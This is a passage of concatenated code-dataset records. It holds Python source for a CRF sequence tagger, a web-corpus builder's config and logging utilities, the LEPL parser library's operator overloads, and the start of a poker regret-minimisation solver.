datetime.now()\n # 随机打乱数据\n random.shuffle(trainset)\n # 设置L2正则化系数\n if not regularize:\n lmbda = 0\n # 按照指定大小对数据分割批次\n batches = [trainset[i:i + batch_size]\n for i in range(0, len(trainset), batch_size)]\n nb = len(batches)\n # 根据批次数据更新权重\n for batch in batches:\n if not anneal:\n self.update(batch, lmbda, n, eta)\n # 设置学习速率的指数衰减\n else:\n self.update(batch, lmbda, n, eta * decay ** (count / nb))\n count += 1\n\n print(\"Epoch %d / %d: \" % (epoch, epochs))\n tp, total, accuracy = self.evaluate(trainset)\n print(\"%-6s %d / %d = %4f\" % ('train:', tp, total, accuracy))\n tp, total, accuracy = self.evaluate(devset)\n print(\"%-6s %d / %d = %4f\" % ('dev:', tp, total, accuracy))\n t = datetime.now() - start\n print(\"%ss elapsed\\n\" % t)\n total_time += t\n\n # 保存效果最好的模型\n if accuracy > max_accuracy:\n self.dump(file)\n max_e, max_accuracy = epoch, accuracy\n elif epoch - max_e > interval:\n break\n print(\"max accuracy of dev is %4f at epoch %d\" %\n (max_accuracy, max_e))\n print(\"mean time of each epoch is %ss\\n\" % (total_time / epoch))\n\n def update(self, batch, lmbda, n, eta):\n gradients = defaultdict(float)\n\n for wiseq, tiseq in batch:\n prev_ti = -1\n for i, ti in enumerate(tiseq):\n fiseq = (self.fdict[f]\n for f in self.instantiate(wiseq, i, prev_ti)\n if f in self.fdict)\n for fi in fiseq:\n gradients[fi, ti] += 1\n prev_ti = ti\n\n alpha = self.forward(wiseq)\n beta = self.backward(wiseq)\n logZ = logsumexp(alpha[-1])\n\n fv = self.instantiate(wiseq, 0, -1)\n fiseq = (self.fdict[f] for f in fv if f in self.fdict)\n p = np.exp(self.score(fv) + beta[0] - logZ)\n for fi in fiseq:\n gradients[fi] -= p\n\n for i in range(1, len(tiseq)):\n ufv = self.unigram(wiseq, i)\n ufiseq = [self.fdict[f] for f in ufv if f in self.fdict]\n scores = self.BS + self.score(ufv)\n probs = np.exp(scores + alpha[i - 1][:, None] + beta[i] - logZ)\n\n for bfv, p in zip(self.BF, probs):\n bfiseq = [self.fdict[f] for f in bfv if f in self.fdict]\n for fi in bfiseq + ufiseq:\n gradients[fi] -= p\n\n if lmbda != 0:\n self.W *= (1 - eta * lmbda / n)\n for k, v in gradients.items():\n self.W[k] += eta * v\n self.BS = np.array([self.score(bfv) for bfv in self.BF])\n\n def forward(self, wiseq):\n T = len(wiseq)\n alpha = np.zeros((T, self.nt))\n\n fv = self.instantiate(wiseq, 0, -1)\n alpha[0] = self.score(fv)\n\n for i in range(1, T):\n uscores = self.score(self.unigram(wiseq, i))\n scores = np.transpose(self.BS + uscores)\n alpha[i] = logsumexp(scores + alpha[i - 1], axis=1)\n return alpha\n\n def backward(self, wiseq):\n T = len(wiseq)\n beta = np.zeros((T, self.nt))\n\n for i in reversed(range(T - 1)):\n uscores = self.score(self.unigram(wiseq, i + 1))\n scores = self.BS + uscores\n beta[i] = logsumexp(scores + beta[i + 1], axis=1)\n return beta\n\n def predict(self, wiseq):\n T = len(wiseq)\n delta = np.zeros((T, self.nt))\n paths = np.zeros((T, self.nt), dtype='int')\n\n fv = self.instantiate(wiseq, 0, -1)\n delta[0] = self.score(fv)\n\n for i in range(1, T):\n uscores = self.score(self.unigram(wiseq, i))\n scores = np.transpose(self.BS + uscores) + delta[i - 1]\n paths[i] = np.argmax(scores, axis=1)\n delta[i] = scores[np.arange(self.nt), paths[i]]\n prev = np.argmax(delta[-1])\n\n predict = [prev]\n for i in reversed(range(1, T)):\n prev = paths[i, prev]\n predict.append(prev)\n predict.reverse()\n return predict\n\n def score(self, fvector):\n scores = np.array([self.W[self.fdict[f]]\n for f in fvector if f in self.fdict])\n return np.sum(scores, axis=0)\n\n def bigram(self, prev_ti):\n return [('01', prev_ti)]\n\n def unigram(self, wiseq, index):\n word = wiseq[index]\n prev_word = wiseq[index - 1] if index > 0 else '^^'\n next_word = wiseq[index + 1] if index < len(wiseq) - 1 else '$$'\n prev_char = prev_word[-1]\n next_char = next_word[0]\n first_char = word[0]\n last_char = word[-1]\n\n fvector = []\n fvector.append(('02', word))\n fvector.append(('03', prev_word))\n fvector.append(('04', next_word))\n fvector.append(('05', word, prev_char))\n fvector.append(('06', word, next_char))\n fvector.append(('07', first_char))\n fvector.append(('08', last_char))\n\n for char in word[1:-1]:\n fvector.append(('09', char))\n fvector.append(('10', first_char, char))\n fvector.append(('11', last_char, char))\n if len(word) == 1:\n fvector.append(('12', word, prev_char, next_char))\n for i in range(1, len(word)):\n prev_char, char = word[i - 1], word[i]\n if prev_char == char:\n fvector.append(('13', char, 'consecutive'))\n if i <= 4:\n fvector.append(('14', word[:i]))\n fvector.append(('15', word[-i:]))\n if len(word) <= 4:\n fvector.append(('14', word))\n fvector.append(('15', word))\n return fvector\n\n def instantiate(self, wiseq, index, prev_ti):\n bigram = self.bigram(prev_ti)\n unigram = self.unigram(wiseq, index)\n return bigram + unigram\n\n def evaluate(self, data):\n tp, total = 0, 0\n\n for wiseq, tiseq in data:\n total += len(wiseq)\n piseq = np.array(self.predict(wiseq))\n tp += np.sum(tiseq == piseq)\n accuracy = tp / total\n return tp, total, accuracy\n\n def dump(self, file):\n with open(file, 'wb') as f:\n pickle.dump(self, f)\n\n @classmethod\n def load(cls, file):\n with open(file, 'rb') as f:\n crf = pickle.load(f)\n return crf\n","repo_name":"yzhangcs/CRF","sub_path":"ocrf.py","file_name":"ocrf.py","file_ext":"py","file_size_in_byte":8293,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"61"} +{"seq_id":"43376353751","text":"#!/usr/bin/env python3\n# -*- coding: utf-8, vim: expandtab:ts=4 -*-\n\nimport os\nimport re\nimport sys\nimport yaml\nimport logging\nfrom datetime import date, timedelta, datetime\n\n\ndef wrap_input_consants(current_task_config_filename):\n \"\"\"\n Helper to store and process input data so that main function does not contain so many\n codelines of variable initialization\n Fields should be handled as constants after initialization\n CAPITALIZED KEYS are transformed runtime (e.g. Regular Expressions),\n lowercase keys are present in the config and will be used as is\n \"\"\"\n # Instructions to the current task\n with open(current_task_config_filename, encoding='UTF-8') as fh:\n settings = yaml.load(fh)\n\n # The directory name of the configs\n dir_name = os.path.dirname(os.path.abspath(current_task_config_filename))\n\n # Technical data about the website to crawl\n with open(os.path.join(dir_name, settings['site_schemas']), encoding='UTF-8') as fh:\n current_site_schema = yaml.load(fh)[settings['site_name']]\n\n if len(settings.keys() & current_site_schema.keys()) > 0:\n raise KeyError('Config file key collision!')\n settings.update(current_site_schema)\n\n settings['TAGS_KEYS'] = {re.compile(tag_key): val for tag_key, val in settings['tags_keys'].items()}\n\n # If the program is to create a corpus, then it will load the required tags and compile the REs\n if settings['create_corpus']:\n with open(os.path.join(dir_name, settings['tags']), encoding='UTF-8') as fh:\n all_tags = yaml.load(fh)\n common_tags = all_tags['common']\n\n cleaning_rules = {}\n general_cleaning_rules = common_tags.pop('general_cleaning_rules', {}) # Also remove general rules from common!\n for rule, regex in ((rule, regex) for rule, regex in general_cleaning_rules.items()\n if not rule.endswith('_repl')):\n r = re.compile(regex)\n cleaning_rules[rule] = lambda x: r.sub(general_cleaning_rules['{0}_repl'.format(rule)], x)\n\n site_tags = {}\n for tag_key_readable in settings['TAGS_KEYS'].values():\n site_tags[tag_key_readable] = {}\n if tag_key_readable is not None: # None == Explicitly ignored\n for tag_name, tag_desc in all_tags[tag_key_readable].items():\n site_tags[tag_key_readable][tag_name] = {}\n site_tags[tag_key_readable][tag_name]['open-inside-close'] = re.compile('{0}{1}{2}'.\n format(tag_desc['open'],\n tag_desc['inside'],\n tag_desc['close']))\n site_tags[tag_key_readable][tag_name]['open'] = re.compile(tag_desc['open'])\n site_tags[tag_key_readable][tag_name]['close'] = re.compile(tag_desc['close'])\n\n else:\n site_tags = {}\n common_tags = {'article_begin_mark': '', 'article_end_mark': ''}\n cleaning_rules = {}\n settings['SITE_TAGS'] = site_tags\n settings['COMMON_SITE_TAGS'] = common_tags\n settings['GENERAL_CLEANING_RULES'] = cleaning_rules\n\n settings['BEFORE_ARTICLE_URL_RE'] = re.compile(current_site_schema['before_article_url'])\n settings['AFTER_ARTICLE_URL_RE'] = re.compile(current_site_schema['after_article_url'])\n settings['ARTICLE_URL_FORMAT_RE'] = re.compile('{0}{1}{2}'.format(current_site_schema['before_article_url'],\n current_site_schema['article_url_format'],\n current_site_schema['after_article_url']))\n\n settings['BEFORE_NEXT_PAGE_URL_RE'] = re.compile(current_site_schema['before_next_page_url'])\n settings['AFTER_NEXT_PAGE_URL_RE'] = re.compile(current_site_schema['after_next_page_url'])\n settings['NEXT_PAGE_URL_FORMAT_RE'] = re.compile('{0}{1}{2}'.format(current_site_schema['before_next_page_url'],\n current_site_schema['next_page_url_format'],\n current_site_schema['after_next_page_url']))\n\n settings['BEFORE_ARTICLE_DATE_RE'] = re.compile(current_site_schema['before_article_date'])\n settings['AFTER_ARTICLE_DATE_RE'] = re.compile(current_site_schema['after_article_date'])\n settings['ARTICLE_DATE_FORMAT_RE'] = re.compile('{0}{1}{2}'.format(current_site_schema['before_article_date'],\n current_site_schema['article_date_format'],\n current_site_schema['after_article_date']))\n\n settings['filter_articles_by_date'] = False\n if 'date_from' in settings and 'date_until' in settings:\n # We generate all URLs FROM the past UNTIL the \"not so past\"\n # Raises ValueError if there is something wrong\n if isinstance(settings['date_from'], datetime):\n raise ValueError('DateError: date_from not datetime ({0})!'.format(settings['date_from']))\n if isinstance(settings['date_until'], datetime):\n raise ValueError('DateError: date_until not datetime ({0})!'.format(settings['date_until']))\n if settings['date_from'] > settings['date_until']:\n raise ValueError('DateError: date_from is later than DATE UNTIL!')\n\n settings['filter_articles_by_date'] = True # Date filtering ON in any other cases OFF\n\n # if there is no time filtering then we use dates only if they are needed to generate URLs\n elif settings['archive_page_urls_by_date']:\n if 'date_from' in settings:\n # We generate all URLs from the first day of the website until yesterday\n if isinstance(settings['date_from'], datetime):\n raise ValueError('DateError: date_from not datetime ({0})!'.format(settings['date_from']))\n else:\n settings['date_from'] = current_site_schema['date_first_article']\n if isinstance(current_site_schema['date_first_article'], datetime):\n raise ValueError('DateError: date_first_article not datetime ({0})!'.\n format(current_site_schema['date_first_article']))\n settings['date_until'] = date.today() - timedelta(1) # yesterday\n\n if settings['date_from'] > settings['date_until']:\n raise ValueError('DateError: date_from is later than DATE UNTIL!')\n\n return settings\n\n\nclass Logger:\n \"\"\"\n Handle logging with Python's built-in logging facilities simplified\n \"\"\"\n def __init__(self, log_filename, console_level='INFO', console_stream=sys.stderr,\n logfile_level='INFO', logfile_mode='a', logfile_encoding='UTF-8'):\n # logging.basicConfig(level=logging.INFO)\n log_levels = {'DEBUG': logging.DEBUG, 'INFO': logging.INFO, 'WARNING': logging.WARNING, 'ERROR': logging.ERROR,\n 'CRITICAL': logging.CRITICAL}\n\n if console_level not in log_levels:\n raise KeyError('Console loglevel is not valid ({0}): {1}'.format(', '.join(log_levels.keys()),\n console_level))\n if logfile_level not in log_levels:\n raise KeyError('Logfile loglevel is not valid ({0}): {1}'.format(', '.join(log_levels.keys()),\n logfile_level))\n\n # Create logger\n self._logger = logging.getLogger(log_filename) # Logger is named after the logfile\n self._logger.propagate = False\n\n # Create handler one for console output and one for logfile and set their properties accordingly\n c_handler = logging.StreamHandler(stream=console_stream)\n f_handler = logging.FileHandler(log_filename, mode=logfile_mode, encoding=logfile_encoding)\n c_handler.setLevel(console_level)\n f_handler.setLevel(logfile_level)\n\n # Create formatters and add them to handlers\n c_format = logging.Formatter('{asctime} {levelname}: {message}', style='{')\n f_format = logging.Formatter('{asctime} {levelname}: {message}', style='{')\n c_handler.setFormatter(c_format)\n f_handler.setFormatter(f_format)\n\n # Add handlers to the logger\n self._logger.addHandler(c_handler)\n self._logger.addHandler(f_handler)\n if console_level < logfile_level:\n self._logger.setLevel(console_level)\n else:\n self._logger.setLevel(logfile_level)\n\n self._leveled_logger = {'DEBUG': self._logger.debug, 'INFO': self._logger.info, 'WARNING': self._logger.warning,\n 'ERROR': self._logger.error, 'CRITICAL': self._logger.critical}\n\n self.log('INFO', 'Logging started')\n\n def log(self, level, msg):\n if level in self._leveled_logger:\n self._leveled_logger[level](msg)\n else:\n self._leveled_logger['CRITICAL']('UNKNOWN LOGGING LEVEL SPECIFIED FOR THE NEXT ENTRY: {0}'.format(level))\n self._leveled_logger['CRITICAL'](msg)\n\n def __del__(self):\n handlers = list(self._logger.handlers)\n for h in handlers:\n self._logger.removeHandler(h)\n h.flush()\n if isinstance(h, logging.FileHandler):\n h.close()\n","repo_name":"ppke-nlpg/corpusbuilder","sub_path":"corpusbuilder/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":9646,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"2558573504","text":"\nfrom lepl.matchers.matcher import Matcher\nfrom lepl.support.context import Namespace, NamespaceMixin, Scope\nfrom lepl.support.lib import open_stop, format, basestring\n\n\nclass OperatorNamespace(Namespace):\n '''\n Define the default operators.\n '''\n \n def __init__(self):\n # Handle circular dependencies\n from lepl.matchers.error import raise_error\n from lepl.matchers.derived import Space, Add, Apply, KApply, Drop, \\\n Repeat, Map\n from lepl.matchers.combine import And, Or, First\n super(OperatorNamespace, self).__init__({\n SPACE_OPT: lambda a, b: And(a, Space()[0:,...], b),\n SPACE_REQ: lambda a, b: And(a, Space()[1:,...], b),\n ADD: lambda a, b: Add(And(a, b)),\n AND: And,\n OR: Or,\n APPLY: Apply,\n APPLY_RAW: lambda a, b: Apply(a, b, raw=True),\n NOT: Drop,\n KARGS: KApply,\n RAISE: lambda a, b: KApply(a, raise_error(b)),\n REPEAT: Repeat,\n FIRST: First,\n MAP: Map\n })\n \n\nOPERATORS = 'operators'\n'''\nThe name used to retrieve operators definitions.\n'''\n\nSPACE_OPT = '/'\n'''Name for / operator.'''\nSPACE_REQ = '//'\n'''Name for // operator.'''\nADD = '+'\n'''Name for + operator.'''\nAND = '&'\n'''Name for & operator.'''\nOR = '|'\n'''Name for | operator.'''\nAPPLY = '>'\n'''Name for > operator.'''\nAPPLY_RAW = '>='\n'''Name for >= operator.'''\nNOT = '~'\n'''Name for ~ operator.'''\nKARGS = '**'\n'''Name for ** operator.'''\nRAISE = '^'\n'''Name for ^ operator.'''\nREPEAT = '[]'\n'''Name for [] operator.'''\nFIRST = '%'\n'''Name for % operator.'''\nMAP = '>>'\n'''Name for >> operator.'''\n\n\nclass Override(Scope):\n '''\n Allow an operator to be redefined within a with context. Uses the \n OPERATORS namespace.\n '''\n\n def __init__(self, space_opt=None, space_req=None, repeat=None,\n add=None, and_=None, or_=None, not_=None, \n apply_=None, apply_raw=None, kargs=None, \n raise_=None, first=None, map_=None):\n super(Override, self).__init__(OPERATORS, OperatorNamespace,\n {SPACE_OPT: space_opt, SPACE_REQ: space_req,\n REPEAT: repeat, ADD: add, AND: and_, OR: or_, \n NOT: not_, APPLY: apply_, APPLY_RAW: apply_raw,\n KARGS: kargs, RAISE: raise_, FIRST: first, MAP: map_})\n\n\nclass _BaseSeparator(Override):\n '''\n Support class for `Separator` and similar classes.\n \n Uses the OPERATORS namespace.\n '''\n \n def __init__(self, separator):\n '''\n If the separator is a string it is coerced to `Regexp()`; if None\n then any previous defined separator is effectively removed.\n '''\n # Handle circular dependencies\n from lepl.matchers.core import Regexp\n from lepl.matchers.combine import And\n from lepl.matchers.derived import Repeat\n from lepl.matchers.support import coerce_\n if separator is None:\n and_ = And\n repeat = Repeat\n else:\n separator = coerce_(separator, Regexp)\n (and_, repeat) = self._replacements(separator)\n super(_BaseSeparator, self).__init__(and_=and_, repeat=repeat)\n\n def _replacements(self, _separator):\n '''\n Sub-classes should return (And, Repeat)\n '''\n raise Exception('Unimplemented')\n \n def _repeat(self, separator):\n '''\n A simple Repeat with separator.\n '''\n from lepl.matchers.combine import And\n from lepl.matchers.derived import Repeat\n def repeat(m, st=0, sp=None, d=0, s=None, a=False):\n '''\n Wrap `Repeat` to adapt the separator.\n '''\n if s is None:\n s = separator\n elif not a:\n s = And(separator, s, separator)\n return Repeat(m, st, sp, d, s, a)\n return repeat\n \n\nclass Separator(_BaseSeparator):\n '''\n Redefine ``[]`` and ``&`` to include the given matcher as a separator \n (so it will be used between list items and between matchers separated by the & \n operator)\n \n Uses the OPERATORS namespace.\n '''\n \n def _replacements(self, separator):\n '''\n Require the separator on each `And`.\n '''\n # Handle circular dependencies\n from lepl.matchers.combine import And\n return (lambda a, b: And(a, separator, b),\n self._repeat(separator))\n \n \nclass DroppedSpace(Separator):\n '''\n Skip spaces (by default, one or more Space()). Any argument is dropped.\n '''\n \n def __init__(self, space=None):\n from lepl.matchers.derived import Space, Drop\n if space is None:\n space = Space()[:]\n space = Drop(space)\n super(DroppedSpace, self).__init__(space)\n \n\nclass SmartSeparator1(_BaseSeparator):\n '''\n Similar to `Separator`, but tried to be clever about whether the \n separator is needed. It replaces `&` with a matcher that only uses \n the separator if the second sub-matcher consumes some input.\n \n Uses the OPERATORS namespace.\n \n See also `SmartSeparator2`, which is less general, but more efficient.\n '''\n \n def _replacements(self, separator):\n '''\n Require the separator on each `And`.\n '''\n # Handle circular dependencies\n from lepl.matchers.combine import And, Or\n from lepl.matchers.core import Consumer\n def and_(a, b):\n '''\n Add space only in the case when both consume something.\n '''\n return Or(And(Consumer(a), separator, Consumer(b)),\n And(Consumer(a), Consumer(b, False)),\n And(Consumer(a, False), Consumer(b)),\n And(Consumer(a, False), Consumer(b, False)))\n return (and_, self._repeat(separator))\n \n \nGREEDY = 'g'\n'''Flag (splice increment) for inefficient, guaranteed greedy matching.'''\nNON_GREEDY = 'n'\n'''Flag (splice increment) for inefficient, guaranteed non-greedy matching.'''\nDEPTH_FIRST = 'd'\n'''Flag (splice increment) for efficient, quasi-greedy, matching (default).'''\nBREADTH_FIRST = 'b'\n'''Flag (splice increment) for efficient, quasi-non-greedy, matching.'''\n\n\nclass OperatorMixin(NamespaceMixin):\n '''\n Define the operators used to combine elements in a grammar specification.\n '''\n\n def __init__(self, name, namespace):\n super(OperatorMixin, self).__init__(name, namespace)\n \n def __add__(self, other):\n '''\n **self + other** - Join strings, merge lists.\n \n Combine adjacent matchers in sequence, merging the result with \"+\" \n (so strings are joined, lists merged).\n \n :Parameters:\n \n other\n Another matcher or a string that will be converted to a literal\n match.\n '''\n self.__check(ADD, other, True)\n return self._lookup(ADD)(self, other)\n\n def __radd__(self, other):\n '''\n **other + self** - Join strings, merge lists.\n \n Combine adjacent matchers in sequence, merging the result with \"+\" \n (so strings are joined, lists merged).\n \n :Parameters:\n \n other\n Another matcher or a string that will be converted to a literal\n match.\n '''\n self.__check(ADD, other, True)\n return self._lookup(ADD)(other, self)\n\n def __and__(self, other):\n '''\n **self & other** - Append results.\n \n Combine adjacent matchers in sequence. This is equivalent to \n `And()`.\n \n :Parameters:\n \n other\n Another matcher or a string that will be converted to a literal\n match.\n '''\n self.__check(AND, other, True)\n return self._lookup(AND)(self, other) \n \n def __rand__(self, other):\n '''\n **other & self** - Append results.\n \n Combine adjacent matchers in sequence. This is equivalent to \n `And()`.\n \n :Parameters:\n \n other\n Another matcher or a string that will be converted to a literal\n match.\n '''\n self.__check(AND, other, True)\n return self._lookup(AND)(other, self)\n \n def __div__(self, other):\n '''\n For 2.6\n '''\n return self.__truediv__(other)\n \n def __rdiv__(self, other):\n '''\n For 2.6\n '''\n return self.__rtruediv__(other)\n \n def __truediv__(self, other):\n '''\n **self / other** - Append results, with optional separating space.\n \n Combine adjacent matchers in sequence, with an optional space between\n them. The space is included in the results.\n \n :Parameters:\n \n other\n Another matcher or a string that will be converted to a literal\n match.\n '''\n self.__check(SPACE_OPT, other, True)\n return self._lookup(SPACE_OPT)(self, other)\n \n def __rtruediv__(self, other):\n '''\n **other / self** - Append results, with optional separating space.\n \n Combine adjacent matchers in sequence, with an optional space between\n them. The space is included in the results.\n \n :Parameters:\n \n other\n Another matcher or a string that will be converted to a literal\n match.\n '''\n self.__check(SPACE_OPT, other, True)\n return self._lookup(SPACE_OPT)(other, self)\n \n def __floordiv__(self, other):\n '''\n **self // other** - Append results, with required separating space.\n \n Combine adjacent matchers in sequence, with a space between them. \n The space is included in the results.\n \n :Parameters:\n \n other\n Another matcher or a string that will be converted to a literal\n match.\n '''\n self.__check(SPACE_REQ, other, True)\n return self._lookup(SPACE_REQ)(self, other)\n \n def __rfloordiv__(self, other):\n '''\n **other // self** - Append results, with required separating space.\n \n Combine adjacent matchers in sequence, with a space between them. \n The space is included in the results.\n \n :Parameters:\n \n other\n Another matcher or a string that will be converted to a literal\n match.\n '''\n self.__check(SPACE_REQ, other, True)\n return self._lookup(SPACE_REQ)(other, self)\n \n def __or__(self, other):\n '''\n **self | other** - Try alternative matchers.\n \n This introduces backtracking. Matches are tried from left to right\n and successful results returned (one on each \"recall\"). This is \n equivalent to `Or()`.\n \n :Parameters:\n \n other\n Another matcher or a string that will be converted to a literal\n match.\n '''\n self.__check(OR, other, True)\n return self._lookup(OR)(self, other) \n \n def __ror__(self, other):\n '''\n **other | self** - Try alternative matchers.\n \n This introduces backtracking. Matches are tried from left to right\n and successful results returned (one on each \"recall\"). This is \n equivalent to `Or()`.\n \n :Parameters:\n \n other\n Another matcher or a string that will be converted to a literal\n match.\n '''\n self.__check(OR, other, True)\n return self._lookup(OR)(other, self) \n \n def __mod__(self, other):\n '''\n **self % other** - Take first match (committed choice).\n \n Matches are tried from left to right and the first successful result\n is returned. This is equivalent to `First()`.\n \n :Parameters:\n \n other\n Another matcher or a string that will be converted to a literal\n match.\n '''\n self.__check(FIRST, other, True)\n return self._lookup(FIRST)(self, other) \n \n def __rmod__(self, other):\n '''\n **other % self** - Take first match (committed choice).\n \n Matches are tried from left to right and the first successful result\n is returned. This is equivalent to `First()`.\n \n :Parameters:\n \n other\n Another matcher or a string that will be converted to a literal\n match.\n '''\n self.__check(FIRST, other, True)\n return self._lookup(FIRST)(other, self) \n \n def __invert__(self):\n '''\n **~self** - Discard the result.\n\n This generates a matcher that behaves as the original, but returns\n an empty list. This is equivalent to `Drop()`.\n \n Note that `Lookahead()` overrides this method to have\n different semantics (negative lookahead).\n '''\n return self._lookup(NOT)(self) \n \n def __getitem__(self, indices):\n '''\n **self[start:stop:algorithm, separator, ...]** - Repetition and lists.\n \n This is a complex statement that modifies the current matcher so\n that it matches several times. A separator may be specified\n (eg for comma-separated lists) and the results may be combined with\n \"+\" (so repeated matching of characters would give a word).\n \n start:stop:algorithm\n This controls the number of matches made and the order in which\n different numbers of matches are returned.\n \n [start]\n Repeat exactly *start* times\n \n [start:stop]\n Repeat *start* to *stop* times (starting with as many matches\n as possible, and then decreasing as necessary).\n \n [start:stop:algorithm]\n Direction selects the algorithm for searching.\n \n 'b' (BREADTH_FIRST)\n A breadth first search is used, which tends to give shorter\n matches before longer ones. This tries all possible matches for \n the sub-matcher first (before repeating calls to consume more \n of the stream). If the sub-matcher does not backtrack then this \n guarantees that the number of matches returned will not decrease \n (ie will monotonically increase) on backtracking.\n \n 'd' (DEPTH_FIRST)\n A depth first search is used, which tends to give longer\n matches before shorter ones. This tries to repeats matches \n with the sub-matcher, consuming as much of the stream as \n possible, before backtracking to find alternative matchers.\n If the sub-matcher does not backtrack then this guarantees\n that the number of matches returned will not increase (ie will\n monotonically decrease) on backtracking.\n \n 'g' (GREEDY)\n An exhaustive search is used, which finds all results (by \n breadth first search) and orders them by length before returning \n them ordered from longest to shortest. This guarantees that\n the number of matches returned will not increase (ie will\n monotonically decrease) on backtracking, but can consume a lot \n of resources.\n \n 'n' (NON_GREEDY)\n As for 'g' (GREEDY), but results are ordered shortest to \n longest. This guarantees that the number of matches returned \n will not decrease (ie will monotonically increase) on \n backtracking, but can consume a lot of resources,\n \n Values may be omitted; the defaults are: *start* = 0, *stop* = \n infinity, *algorithm* = 'd' (DEPTH_FIRST).\n\n separator\n If given, this must appear between repeated values. Matched\n separators are returned as part of the result (unless, of course,\n they are implemented with a matcher that returns nothing). If \n *separator* is a string it is converted to a literal match.\n\n ...\n If ... (an ellipsis) is given then the results are joined together\n with \"+\". \n\n Examples\n --------\n \n Any()[0:3,...] will match 3 or less characters, joining them\n together so that the result is a single string.\n \n Word()[:,','] will match a comma-separated list of words.\n \n value[:] or value[0:] or value[0::'d'] is a \"greedy\" match that,\n if value does not backtrack, is equivalent to the \"*\" in a regular\n expression.\n value[::'n'] is the \"non-greedy\" equivalent (preferring as short a \n match as possible) and value[::'g'] is greedy even when value does\n provide alternative matches on backtracking.\n '''\n start = 0\n stop = None\n step = DEPTH_FIRST\n separator = None\n add = False\n if not isinstance(indices, tuple):\n indices = [indices]\n for index in indices:\n if isinstance(index, int):\n start = index\n stop = index\n step = DEPTH_FIRST\n elif isinstance(index, slice):\n start = index.start if index.start != None else 0\n stop = index.stop if not open_stop(index) else None\n step = index.step if index.step != None else DEPTH_FIRST\n elif index == Ellipsis:\n add = True\n elif separator is None:\n separator = index\n else:\n raise TypeError(index)\n return self._lookup(REPEAT)(self, start, stop, step, separator, add)\n \n def __gt__(self, function):\n '''\n **self > function** - Process or label the results.\n \n Create a named pair or apply a function to the results. This is\n equivalent to `Apply()`.\n \n :Parameters:\n \n function\n This can be a string or a function.\n \n If a string is given each result is replaced by a \n (name, value) pair, where name is the string and value is the\n result.\n \n If a function is given it is called with the results as an\n argument. The return value is used *within a list* as the new \n result. This is equivalent to `Apply()` with raw=False.\n '''\n self.__check(APPLY, function, False)\n return self._lookup(APPLY)(self, function) \n \n def __ge__(self, function):\n '''\n **self >= function** - Process or label the results.\n \n Apply a function to the results. \n This is equivalent to `Apply(raw=True)`.\n \n :Parameters:\n \n function\n This is called with the results as an argument. The return value \n is used as the new result. This is equivalent to `Apply()` with \n raw=True.\n '''\n self.__check(APPLY_RAW, function, False)\n return self._lookup(APPLY_RAW)(self, function) \n \n def __rshift__(self, function):\n '''\n **self >> function** - Process or label the results (map).\n \n Create a named pair or apply a function to each result in turn. \n This is equivalent to `Map()`. It is similar to \n *self >= function*, except that the function is applied to each \n result in turn.\n \n :Parameters:\n \n function\n This can be a string or a function.\n \n If a string is given each result is replaced by a \n (name, value) pair, where name is the string and value is the\n result.\n \n If a function is given it is called with each result in turn.\n The return values are used as the new result.\n '''\n self.__check(MAP, function, False)\n return self._lookup(MAP)(self, function) \n \n def __pow__(self, function):\n '''\n **self \\** function** - Process the results (\\**kargs).\n \n Apply a function to keyword arguments\n This is equivalent to `KApply()`.\n \n :Parameters:\n \n function\n A function that is called with the keyword arguments described below.\n The return value is used as the new result.\n\n Keyword arguments:\n \n stream_in\n The stream passed to the matcher.\n \n stream_out\n The stream returned from the matcher.\n \n results\n A list of the results returned.\n '''\n self.__check(KARGS, function, False)\n return self._lookup(KARGS)(self, function) \n \n def __xor__(self, message):\n '''\n **self ^ message**\n \n Raise a SytaxError.\n \n :Parameters:\n \n message\n The message for the SyntaxError.\n '''\n return self._lookup(RAISE)(self, message)\n \n def __check(self, name, other, is_match):\n '''\n Provide some diagnostics if the syntax is completely mixed up.\n '''\n if not isinstance(other, basestring): # can go either way\n if is_match != isinstance(other, Matcher):\n if is_match:\n msg = 'The operator {0} for {1} was applied to something ' \\\n 'that is not a matcher ({2}).'\n else:\n msg = 'The operator {0} for {1} was applied to a matcher ' \\\n '({2}).'\n msg += ' Check syntax and parentheses.'\n raise SyntaxError(format(msg, name, self, other))\n\n","repo_name":"willtang/lyx2ebook","sub_path":"src/lepl/matchers/operators.py","file_name":"operators.py","file_ext":"py","file_size_in_byte":22169,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"61"} +{"seq_id":"33478929277","text":"from bloodRiverGame import bloodRiver\nimport numpy as np\nfrom copy import deepcopy\nfrom bloodRiverGame import hashabledict\nimport eval7\n\n\nclass bloodyStream:\n\n def __init__(self):\n #access via dic[infoset][action]\n #We define the action strategy/regret indices as follows:\n #['FOLD', 'CALL', 'RAISE', 'CHECK', 'BET']\n #[ 0, 1, 2, 3, 4]\n self.regretSum = {0: {}, 1: {}}\n self.strategySum = {0: {}, 1: {}}\n self.strategy = {0: {}, 1: {}}\n self.actionIndex = {'FOLD': 0, 'CALL': 1, 'RAISE': 2, 'CHECK': 3, 'BET': 4}\n \n\n def getStrategy(self, infohash, currentPlayer):\n '''Returns the strategy for the current player via regret matching'''\n\n normalizingSum = 0\n #print(self.regretSum, 'hiiiiiiiiiiiiiii')\n\n for i in range(5):\n self.strategy[currentPlayer][infohash] = self.regretSum[currentPlayer][infohash] if sum(self.regretSum[currentPlayer][infohash]) > 0 else 0\n normalizingSum += self.strategy[currentPlayer][infohash]\n\n if normalizingSum > 0: \n for i in range(5): \n self.strategy[currentPlayer][infohash] = self.strategy[currentPlayer][infohash]/normalizingSum\n else: self.strategy[currentPlayer][infohash] = np.array([0.2, 0.2, 0.2, 0.2, 0.2])\n\n self.strategySum[currentPlayer][infohash] += self.strategy[currentPlayer][infohash]\n\n return self.strategy\n \n def copyGame(self, game):\n '''Copies an intance of the game object'''\n\n gameCopy = bloodRiver()\n attributes = vars(game)\n eval7Copy = lambda lst: [eval7.Card(str(card)) for card in lst]\n\n #hard coding since I can't find a way to reference the attributes iteratively\n gameCopy.deck = eval7Copy(game.deck)\n gameCopy.history = list(game.history)\n gameCopy.stack = np.copy(game.stack)\n gameCopy.currentPlayer = game.currentPlayer\n gameCopy.dealer = game.dealer\n gameCopy.winner = game.winner\n gameCopy.isTerminal = game.isTerminal\n gameCopy.cards = [eval7Copy(game.cards[0]), eval7Copy(game.cards[1])]\n gameCopy.board = eval7Copy(game.board)\n gameCopy.street = game.street\n gameCopy.firstMove = game.firstMove\n\n return gameCopy\n\n\n def 